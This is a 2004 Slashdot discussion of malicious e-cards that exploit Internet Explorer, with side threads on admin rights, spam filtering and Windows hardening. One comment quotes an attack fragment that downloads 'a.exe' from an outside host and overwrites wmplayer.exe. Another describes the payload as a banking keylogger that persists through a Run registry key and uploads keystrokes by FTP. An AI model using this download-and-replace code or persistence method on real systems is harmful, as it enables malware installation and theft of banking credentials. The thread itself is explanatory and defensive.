      Everyone here keeps missing the underlying problem because of their anti-M$ bias.

      True as well. However, it does contribute very much that windos very much encourages this unsafe behaviour, while all Linux and *BSD systems I know go to great pains to discourage it.

    • Okay, run as a Regular User under Win XP.

      Watch as your McAfee antivirus now fails to autoupdate. Find out about it when all the users at your company get the latest virus because they are three months behind the update schedule.

      Wheee!

      Running as a "Regular user" does not work because too much common Windows software will not run properly under anything but "admin" rights.
    • by 0123456 ( 636235 ) on Monday February 16, 2004 @12:11PM (#8294352)
      "The same thing can happen to an idiot running Mozilla under Linux as root,"

      Except:

      a) as far as I'm aware, most or all Linux distributions will create you a new non-admin user account rather than logging you on as a root user by default.

      b) thanks to the wonder of modern miraculous setuid technology, there's no log on as root to run the majority of programs. About the only time I log on as root on Linux is to install apps or update kernels.

      c) thanks to the wonder of modern miraculous 'su' technology, you can run as root in one window while logged on as your normal user account. As far as I'm aware, that's impossible in Windows, requiring you to log out and log back on as Administrator.

      Those are just three reasons why most people run as Administrator on Windows and don't on Linux.
    • by ktulu1115 ( 567549 ) on Monday February 16, 2004 @12:17PM (#8294443)
      You seem to be missing the point. Browsers shouldn't allow this:

      x.Open("GET", "http://adversting.co.uk/a.exe",0);
      s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
      etc...

      This is the problem with IE. Running as admin/root isn't a good idea in general, you are correct, but thats not an excuse for IE's pisspoor security.
  • by DocSnyder ( 10755 ) on Monday February 16, 2004 @11:38AM (#8294014)
    About a year ago, German email users have been spammed with similar e-cards [heise.de], which claimed to need a special presentation plugin. The "plugin" actually dialed an expensive premium-rate service number. Despite thousands of victims complaining about high phone bills, it took about a year [heise.de] to stop this kind of fraud.
  • by Anonymous Coward on Monday February 16, 2004 @11:43AM (#8294065)
    wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

    I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

    My solution: I renamed wscript.exe and cscript.exe so they can't execute.

    • by Anonymous Coward on Monday February 16, 2004 @11:58AM (#8294220)
      Wscript is the default app for .js and .vbs files. All you have to do is change the launching program. You could set them to open with notepad instead. Here's a batch file, save it with a .bat extension:
      ftype JSFile=%SystemRoot%\notepad.exe "%1"
      ftype VBSFile=%SystemRoot%\notepad.exe "%1"
  • by JasonUCF ( 601670 ) <jason-slashdawt&jnlpro,com> on Monday February 16, 2004 @11:50AM (#8294148) Homepage
    You need SpamBayes [sourceforge.net]. The beautiful folks behind it have included an Outlook plugin. Now you can knock your bayesian filter self out with a self contained easily run end-client solution. In smaller words, no need for anything fancy from your ISP, just install, plug, and play. In the few days I have used it my spam has literally dropped to 0. Spams are nailed before I even see them show up in the INBOX (it's that fast).

    Go check it out. It's really, really, good, and free, as in, well, um, beer?

    I have spent too many hours building elaborate rule sets, banning Class A IP's, keyword filters, etcetera. The spam still gets through and it carries nasty payload half the time. Bayesian...bayesian... bayesian...

  • I got one yesterday (Score:4, Interesting)

    by swb ( 14022 ) on Monday February 16, 2004 @11:52AM (#8294164)
    Was the e-card itself (as viewed at the web site 123greetings.com) a problem, or was it the message itself the problem?

    I get those stupid e-cards from relatives occasionally, and I never open the messages in anything but pine because they're usually loaded with crap I don't want to run.

    In this case, I viewed the email in pine, copied the ecard number and viewed the stupid thing on the web site, presuming it would be from my brother (an AOL lifer), since it was my anniversary. It was unattributed on the site, so I figured it was just a spam/traffic generator.

  • by p4ul13 ( 560810 ) on Monday February 16, 2004 @11:55AM (#8294193) Homepage
    Well ok; so it's not ALL bad then.
  • E-cards are EVIL (Score:5, Insightful)

    by rqqrtnb ( 753156 ) on Monday February 16, 2004 @12:03PM (#8294276)
    Why do people still insist on using e-cards?

    They are spam harvesters. Nothing more.

    I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.

    Do I need to attach a note to my emails?

    If you are thinking of sending me an e-card:
    • I will be changing my email address address again, much to the chagrin of everyone else.

    • Since you have have proved incapable of not providing spammers with my personal email address, you will NOT be receiving the new one.

    • You are now limited to traditional (non 21st Century) forms of communication with me.

    What possesses people to do it?

    Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...

    Bastards.

    • by cybergrue ( 696844 ) on Monday February 16, 2004 @12:40PM (#8294679)
      Why do people still insist on using e-cards?
      What possesses people to do it?

      Because they think that it is exactly the same as sending you a physical card, just updated for the 21 centry. They have absolutly no idea that there can be a down-side to these things because they are thinking of it in terms of a physical card. They are probably thinking that since you use a computer a lot, then you will like to see a greeting card on your computer. I know, I have a lot of relatives that have done this in the past, and it took a lot of explaning to them why this was a really bad idea.
  • by leoaugust ( 665240 ) <leoaugust@g[ ]l.com ['mai' in gap]> on Monday February 16, 2004 @12:14PM (#8294393) Journal
    .
    I have been putting my spam with full headers here, [quicktopic.com] and hope that people investigating can use the info in the headers like IP addresses, gateways, aliases etc. As it is cached in Google so the results should show up for specific keywords.

    If you are spam hunters, please be my guest and fry some spammers a***

    .
  • Oh boy... (Score:3, Funny)

    by mog007 ( 677810 ) <Mog007@gm a i l . c om> on Monday February 16, 2004 @12:16PM (#8294420)
    I've got a /. rss feed through a Trillian plug-in, and my window was sized just right to make the title of the article:
    "Malicious E-Cards" - An anal...

    I thought goatse was coming back... in the form of email.

    *Shudder*
  • patching (Score:4, Insightful)

    by Metaldsa ( 162825 ) on Monday February 16, 2004 @12:34PM (#8294624)
    Isn't it funny how we have people complaining how windows auto-update can download patches automatically into users machines and how this is dangerous but at the same time we blame these windows users for not updating their pcs. So when you have tens of millions of windows pcs would you rather MS update them automatically or not? This is problem a dumb question because I bet the /. crowd is divided on it as a matter of privacy and annoyance.
  • Check out Qwik-Fix. (Score:5, Informative)

    by autechre ( 121980 ) on Monday February 16, 2004 @12:42PM (#8294701) Homepage
    Remember Pivx Labs, the folks that used to host the "21 unpatched vulnerabilities in IE" page and has since switched to being a slight MS apologist? They've got a nice product which is (currently) free. What they basically did was to tighten down Windows via things from standard settings to registry tweaks to a degree which most users won't notice. Several of the recently discovered IE vulnerabilities wouldn't have worked, and Blaster wouldn't have worked either under these settings.

    After trying it on my workstation for a couple of weeks, I've started deploying it to others. It seems to interfere with Norton Antivirus, though not McAffee (which is what UMBC machines should be using anyway).

    I also send out the desktops with Mozilla, Media Player Classic, RealAlternative, etc. If people want IM, I try to recommend GAIM. Open source apps tend to have been "written in a more paranoid age" as another poster put it, and also can't as easily get away with doing dumb crap. I also remove the IE and Outlook shortcuts from the desktop (but leave the IE shortcut in the start menu, because the eternally pending PeopleSoft requires it).

  • by Ktistec Machine ( 159201 ) on Monday February 16, 2004 @12:46PM (#8294734)
    Here's a honeypot idea: use the "spy.htm" code to add a machine to the attacker's "spy" log, then wait....
  • Payload (Score:5, Informative)

    by Bob Ince ( 79199 ) <and@@@doxdesk...com> on Monday February 16, 2004 @05:20PM (#8297806) Homepage
    I'm amazed that no-one has yet posted an analysis of the final payload 'a.exe'.

    This decompresses and drops 'ra32.exe', 'lanext.dll' and 'lanman.dll' into the Application Data\Microsoft folder, and sets ra32.exe to run on startup through a HKCU\Software\MS\Win\CV\Run registry entry.

    These files act as a keylogger. When they sees one of a built-in list of online bank sites being used, it logs keypresses for a bit and uploads the result via FTP to a server controlled by the attacker.

    Bizarrely, for me in Windows 2000, it also opens an alert box with the message 'timediff' every 60 seconds. Bug?

"Ninety percent of baseball is half mental." -- Yogi Berra

Working...